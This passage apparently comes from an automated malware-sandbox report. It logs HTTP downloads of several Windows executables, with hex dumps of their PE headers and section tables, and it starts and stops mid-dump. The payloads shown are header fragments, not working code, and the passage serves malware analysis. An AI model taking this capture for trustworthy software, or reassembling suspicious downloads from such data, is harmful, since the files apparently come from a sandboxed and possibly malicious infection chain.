56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c 1c 00 00 00 e0 01 00 00 12 00 00 00 d6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 00 00 00 00 00 02 00 00 02 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 80 13 00 00 00 10 02 00 00 14 00 00 00 ea 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 8e 04 00 00 30 02 00 00 8e 04 00 00 fe 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 8e 04 00 00 c0 06 00 00 8e 04 00 00 8c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 12:53:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 12:53:19 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 12:53:21 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 13 Dec 2024 12:53:23 GMTContent-Type: application/octet-streamContent-Length: 1177600Last-Modified: Fri, 13 Dec 2024 12:51:39 GMTConnection: keep-aliveETag: "675c2ddb-11f800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 1d 5f 48 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 0e 1d 00 fa 0b 00 00 fa 05 00 00 00 00 00 a1 21 01 00 00 10 00 00 00 d0 10 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 12 00 00 04 00 00 c5 23 12 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c b5 10 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 11 00 90 a4 00 00 4c ab 10 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 ab 10 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 0c 00 74 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 f9 0b 00 00 10 00 00 00 fa 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2a be 04 00 00 10 0c 00 00 c0 04 00 00 fe 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 90 d4 00 00 00 d0 10 00 00 94 00 00 00 be 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 90 a4 00 00 00 b0 11 00 00 a6 00 00 00 52 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 12:53:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 12:53:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 13 Dec 2024 12:53:37 GMTContent-Type: application/octet-streamContent-Length: 3223040Last-Modified: Fri, 13 Dec 2024 12:25:38 GMTConnection: keep-aliveETag: "675c27c2-312e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 30 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 31 00 00 04 00 00 ec 1c 32 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3c 1e 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 1d 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 90 06 00 00 06 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 75 74 